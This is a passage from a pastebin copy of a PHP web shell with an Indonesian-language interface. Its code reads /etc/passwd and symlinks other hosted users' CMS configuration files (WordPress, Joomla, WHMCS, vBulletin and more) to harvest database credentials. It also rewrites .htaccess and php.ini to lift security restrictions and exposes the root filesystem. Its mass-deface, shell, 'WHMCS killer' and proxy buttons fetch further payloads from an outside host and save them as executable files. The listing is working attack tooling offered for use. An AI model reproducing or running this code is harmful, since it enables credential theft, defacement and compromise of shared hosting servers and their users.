  1004. <form method="POST"><textarea cols="85" name="passwd" rows="20">'; $uSr=file("/etc/passwd"); foreach($uSr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
  1005. </textarea><br>Your Folder Config Name : <input type="text" class="input" name="folfig" size=40 />
  1006. <select class="inp" title="Select Your Type File" name="type" size=""><option title="type txt" value=".txt">.txt<option><option title="type php" value=".php">.php<option><option title="type shtml" value=".shtml">.shtml<option><option title="type ini" value=".ini">.ini<option></select>
  1007. <input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>
  1008. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  1009. if ($_POST['conf']) {
  1010. $folfig = $_POST['folfig']; $type = $_POST['type'];
  1011. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<blink>Maaf bro fitur Symlink masih di disabled :( </blink>');}
  1012. @mkdir($folfig, 0755);
  1013. @chdir($folfig);
  1014. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex idb.phtml\nAddType txt .php\nAddHandler txt .php";
  1015. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  1016. $passwd=explode("\n",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya ...</center></blink>";
  1017. foreach($passwd as $pwd){ $user=trim($pwd);
  1018. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'~~>wordpress'.$type.'');
  1019. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'~~>wordpress-wp'.$type.'');
  1020. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'~~>wordpress-wp-beta'.$type.'');
  1021. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'~~>wordpress-beta'.$type.'');
  1022. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'~~>wp13-press'.$type.'');
  1023. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'~~>wordpress-wordpress'.$type.'');
  1024. @symlink('/home/'.$user.'/public_html/wordpress/beta/wp-config.php',$user.'~~>wordpress-wordpress-beta'.$type.'');
  1025. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'~~>wordpress-news'.$type.'');
  1026. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'~~>wordpress-new'.$type.'');
  1027. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'~~>wordpress'.$type.'');
  1028. @symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'~~>wordpress-web'.$type.'');
  1029. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'~~>wordpress-blogs'.$type.'');
  1030. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'~~>wordpress-home'.$type.'');
  1031. @symlink('/home/'.$user.'/public_html/protal/wp-config.php',$user.'~~>wordpress-protal'.$type.'');
  1032. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'~~>ordpress-site'.$type.'');
  1033. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'~~>wordpress-main'.$type.'');
  1034. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'~~>wordpress-test'.$type.'');
  1035. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'~~>joomla'.$type.'');
  1036. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'~~>joomla'.$type.'');
  1037. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
  1038. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'~~>joomla-joomla'.$type.'');
  1039. @symlink('/home/'.$user.'/public_html/protal/configuration.php',$user.'~~>joomla-protal'.$type.'');
  1040. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'~~>joomla-joo'.$type.'');
  1041. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'~~>joomla-cms'.$type.'');
  1042. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'~~>joomla-site'.$type.'');
  1043. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'~~>joomla-main'.$type.'');
  1044. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'~~>joomla-news'.$type.'');
  1045. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'~~>joomla-new'.$type.'');
  1046. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'~~>joomla-home'.$type.'');
  1047. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'~~>Vbulletin-forum'.$type.'');
  1048. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'~~>vbluttin'.$type.'');
  1049. @symlink('/home/'.$user.'/public_html/vb3/includes/config.php',$user.'~~>vbluttin3'.$type.'');
  1050. @symlink('/home/'.$user.'/public_html/forum/includes/class_core.php',$user.'~~>vbluttin-class_core.php'.$type.'');
  1051. @symlink('/home/'.$user.'/public_html/vb/includes/class_core.php',$user.'~~>vbluttin-class_core.php1'.$type.'');
  1052. @symlink('/home/'.$user.'/public_html/cc/includes/class_core.php',$user.'~~>vbluttin-class_core.php2'.$type.'');
  1053. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'~~>vb1-config'.$type.'');
  1054. @symlink('/home/'.$user.'/public_html/cpanel/configuration.php',$user.'~~>cpanel'.$type.'');
  1055. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'~~>panel'.$type.'');
  1056. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'~~>host'.$type.'');
  1057. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'~~>hosting'.$type.'');
  1058. @symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.'~~>hosts'.$type.'');
  1059. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'~~>zencart'.$type.'');
  1060. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'~~>zencart-shop'.$type.'');
  1061. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'~~>hop-ZCshop'.$type.'');
  1062. @symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'~~>mk-portale1'.$type.'');
  1063. @symlink('/home/'.$user.'/public_html/Settings.php',$user.'~~>smf'.$type.'');
  1064. @symlink('/home/'.$user.'/public_html/smf/Settings.php',$user.'~~>smf-smf'.$type.'');
  1065. @symlink('/home/'.$user.'/public_html/forum/Settings.php',$user.'~~>smf-forum'.$type.'');
  1066. @symlink('/home/'.$user.'/public_html/forums/Settings.php',$user.'~~>smf-forums'.$type.'');
  1067. @symlink('/home/'.$user.'/public_html/upload/includes/config.php',$user.'~~>upload'.$type.'');
  1068. @symlink('/home/'.$user.'/public_html/incl/config.php',$user.'~~>malay'.$type.'');
  1069. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'~~>clents'.$type.'');
  1070. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'~~>client2'.$type.'');
  1071. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'~~>client'.$type.'');
  1072. @symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'~~>lokomedia'.$type.'');
  1073. @symlink('/home/'.$user.'/public_html/admin/config.php',$user.'~~>webconfig'.$type.'');
  1074. @symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'~~>webconfig2'.$type.'');
  1075. @symlink('/home/'.$user.'/public_html/system/sistem.php',$user.'~~>lokomedia1'.$type.'');
  1076. @symlink('/home/'.$user.'/public_html/sites/default/settings.php',$user.'~~>Drupal'.$type.'');
  1077. @symlink('/home/'.$user.'/public_html/e107_config.php',$user.'~~>e107'.$type.'');
  1078. @symlink('/home/'.$user.'/public_html/datas/config.php',$user.'~~>Seditio'.$type.'');
  1079. @symlink('/home/'.$user.'/public_html/article/config.php',$user.'~~>Nwahy'.$type.'');
  1080. @symlink('/home/'.$user.'/public_html/connect.php',$user.'~~>PHP-Fusion'.$type.'');
  1081. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'~~>traidnt1'.$type.'');
  1082. @symlink('/home/'.$user.'/public_html/config.php',$user.'~~>4images'.$type.'');
  1083. @symlink('/home/'.$user.'/public_html/member/configuration.php',$user.'~~>1member'.$type.'') ;
  1084. @symlink('/home/'.$user.'/public_html/requires/config.php',$user.'~~>AM4SS-hosting'.$type.'');
  1085. @symlink('/home/'.$user.'/public_html/supports/includes/iso4217.php',$user.'~~>hostbills-supports'.$type.'');
  1086. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'~~>hostbills-client'.$type.'');
  1087. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'~~>hostbills-support'.$type.'');
  1088. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'~~>hostbills-billing'.$type.'');
  1089. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'~~>hostbills-billings'.$type.'');
  1090. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'~~>hostbills-host'.$type.'');
  1091. @symlink('/home/'.$user.'/public_html/hosts/includes/iso4217.php',$user.'~~>hostbills-hosts'.$type.'');
  1092. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'~~>hostbills-hosting'.$type.'');
  1093. @symlink('/home/'.$user.'/public_html/hostings/includes/iso4217.php',$user.'~~>hostbills-hostings'.$type.'');
  1094. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'~~>hostbills'.$type.'');
  1095. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'~~>hostbills-hostbills'.$type.'');
  1096. @symlink('/home/'.$user.'/public_html/hostbill/includes/iso4217.php',$user.'~~>hostbills-hostbill'.$type.'');
  1097. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'~~>billing'.$type.'');
  1098. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'~~>whm-manage'.$type.'');
  1099. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'~~>whm-my'.$type.'');
  1100. @symlink('/home/'.$user.'/public_html/myshop/configuration.php',$user.'~~>whm-myshop'.$type.'');
  1101. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'~~>sucure-whm'.$type.'');
  1102. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'~~>sucure-whmcs'.$type.'');
  1103. }
  1104. echo 'Selesai mas/mba bro untuk melihat hasilnya klik ~~> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';
  1105. }
  1106. }
  1107. ?>
  1108. <?php
  1109. if (isset($_GET['idb']) && ($_GET['idb'] == 'auto')) {
  1110. ?>
  1111. <form action="?&amp;idb=auto" method="post">
  1112. <?php
  1113. echo "<form method='POST'>";
  1114. echo "<font size='6' color='blue'><center>==================</center></font><br/>";
  1115. echo "<div align='center'>";
  1116. echo "<input type='submit' name='idb' value='IZIN SERVER'><br/> <br/>";
  1117. echo "</div>";
  1118. echo "<font size='5' color='blue'><center>==================</center></font><br/>";
  1119. echo "<div align='center'>";
  1120. echo "<input type='submit' name='shell' value='MASS DEFACE'> ";
  1121. echo "<input type='submit' name='shell1' value='SHELL DM'> ";
  1122. echo "<input type='submit' name='shell2' value='MYSQL'> ";
  1123. echo "<input type='submit' name='shell3' value='WHMCS KILLER'> ";
  1124. echo "<input type='submit' name='shell4' value='PHP PROXY'></p> ";
  1125. echo "</div>";
  1126.  
  1127.  
  1128. $sh = 'file_get_contents';
  1129.  
  1130. if($_POST['idb']) {
  1131. $ini = "php.ini";
  1132. $open = fopen($ini, 'w');
  1133. $source = ("safe_mode = OFF n
  1134. disable_functions = NONE n
  1135. safe_mode_gid = OFF n
  1136. open_basedir = OFF n
  1137. register_globals = ON n
  1138. exec = ON n
  1139. shell_exec = ON n");
  1140. fwrite($open, $source);
  1141. echo "<font color='lime'>";
  1142. if($open) {
  1143. echo '<hr><p>OK</p>';
  1144. }
  1145. else {
  1146. echo "<font color='red'>";
  1147. echo '<hr><p>NO</p>';
  1148. echo "</font>";
  1149. fclose($open);
  1150. } }
  1151.  
  1152. if($_POST['shell']) {
  1153. $cgi = 'http://azzatssins.yu.tl/files/deface.zip';
  1154. $get11 = $sh($cgi);
  1155. $idbk = fopen('404.html', 'w');
  1156. fwrite($idbk,$get11);
  1157. fclose($idbk);
  1158. {
  1159. @chmod('404.html',0755);
  1160. }
  1161. echo "<font color='aqua'>";
  1162. echo "<hr><a href='404.html' target='_blank'>[Klick Di Sini]</a></center></br>";
  1163. echo "</font>";
  1164. }
  1165. echo "</font>";
  1166.  
  1167. if($_POST['shell1']) {
  1168. $cgi = 'http://azzatssins.yu.tl/files/azzatssins-2.zip';
  1169. $get11 = $sh($cgi);
  1170. $idbk = fopen('404.php', 'w');
  1171. fwrite($idbk,$get11);
  1172. fclose($idbk);
  1173. {
  1174. @chmod('404.php',0755);
  1175. }
  1176. echo "<font color='aqua'>";
  1177. echo "<hr><a href='404.php' target='_blank'>[Klick Di Sini]</a></center></br>";
  1178. echo "</font>";
  1179. }
  1180. echo "</font>";
  1181.  
  1182. if($_POST['shell2']) {
  1183. $cgi = 'http://azzatssins.yu.tl/files/db.zip';
  1184. $get11 = $sh($cgi);
  1185. $idbk = fopen('db.php', 'w');
  1186. fwrite($idbk,$get11);
  1187. fclose($idbk);
  1188. {
  1189. @chmod('db.php',0755);
  1190. }
  1191. echo "<font color='aqua'>";
  1192. echo "<hr><a href='db.php' target='_blank'>[Klick Di Sini]</a></center></br>";
  1193. echo "</font>";
  1194. }
  1195. echo "</font>";
  1196.  
  1197. if($_POST['shell3']) {
  1198. $cgi = 'http://azzatssins.yu.tl/files/whmkiller.zip';
  1199. $get11 = $sh($cgi);
  1200. $idbk = fopen('kill.php', 'w');
  1201. fwrite($idbk,$get11);
  1202. fclose($idbk);
  1203. {
  1204. @chmod('kill.php',0755);
  1205. }
  1206. echo "<font color='aqua'>";
  1207. echo "<hr><a href='kill.php' target='_blank'>[Klick Di Sini]</a></center></br>";
  1208. echo "</font>";
  1209. }
  1210. echo "</font>";
  1211.  
  1212. if($_POST['shell4']) {
  1213. $cgi = 'http://azzatssins.yu.tl/files/PHProxy.zip';
  1214. $get11 = $sh($cgi);
  1215. $idb1k = fopen('PHProxy.php', 'w');
  1216. fwrite($idb1k,$get11);
  1217. fclose($idb1k);
  1218. {
  1219. @chmod('PHProxy.php',0755);
  1220. }
  1221. echo "<font color='aqua'>";
  1222. echo "<hr><a href='PHProxy.php' target='_blank'>[Klick Di Sini]</a></center></br>";
  1223. echo "</font>";
  1224. }
  1225. echo "</font>";
  1226. echo "<font color='blue'>";
  1227. echo "<hr><center>Email <a href='http://azt.mobi'>azzatssinscyberserkers@gmail.com</a></center>";
  1228. echo "<center>Mod by <a href='http://fb.com/azzatssinz'>azzatssin's</a></center>";
  1229. echo "</font>";
  1230. }
  1231. ?>
  1232. <?php
  1233. if (isset($_GET['idb']) && ($_GET['idb'] == 'sym2')) { ?>
  1234. <form action="?>&amp;idb=symlink" method="post">
  1235. <?php
  1236. @session_start();
  1237. @set_time_limit(0);
  1238. @error_reporting(0);
  1239. @ini_set('log_errors', 0);
  1240. @ini_set('error_log', NULL);
  1241. @ini_set('max_execution_time', 0);
  1242. if ($win) {
  1243. echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
  1244. }
  1245. @mkdir('idb2', 0777);
  1246. $sempak = "Options Indexes FollowSymLinks\nDirectoryIndex tr.phtml\nAddType txt .php\nAddHandler txt .php";
  1247. $masuk = @fopen('idb2/.htaccess', 'w');
  1248. fwrite($masuk, $sempak);
  1249. @symlink('/', 'idb2/idb.txt');
  1250. $pg = basename(__FILE__);
  1251. $etc = file_get_contents("/etc/passwd");
  1252. $etcz = explode("
  1253. ", $etc);
  1254. if (is_readable("/etc/passwd")) {
  1255. echo '<center><br/><br/><nobr><b><span class="b7">O=:[ SYMLINK</span> <span class="b8">ETC/PASSWD ]:=O</span></b></nobr><br/><br/> <table align="center" border="3" width="400" cellspacing="0" cellpadding="4">';
  1256. echo '<tr>
  1257. <td align="center"> <font color="white"> <b>_DOMAINS_</b></td>
  1258. <td align="center"> <font color="white"> <b>_USERS_</b></td>
  1259. <td align="center"> <font color="white"> <b>_SYMLINK_</b></td>';
  1260. $list = scandir("/var/named");
  1261. foreach ($etcz as $etz) {
  1262. $etcc = explode(":", $etz);
  1263. foreach ($list as $domain) {
  1264. if (strpos($domain, ".db")) {
  1265. $domain = str_replace('.db', '', $domain);
  1266. $owner = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
  1267. if ($owner['name'] == $etcc[0]) {
  1268. $i+= 1;
  1269. echo "<tr>
  1270. <td><a class='dm' href='http://" . $domain . " '>" . $domain . "</a></td>
  1271. <td align='center'><font color='white'>" . $owner['name'] . "</font></td>
  1272. <td align='center'><a href='idb2/idb.txt" . $owner['dir'] . "/public_html/' target='_blank'>Symlink</a></td>";
  1273. }
  1274. }
  1275. }
  1276. }
  1277. flush();
  1278. flush();
  1279. }
  1280. echo "</tr></table></div></html>";
  1281. }
  1282. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!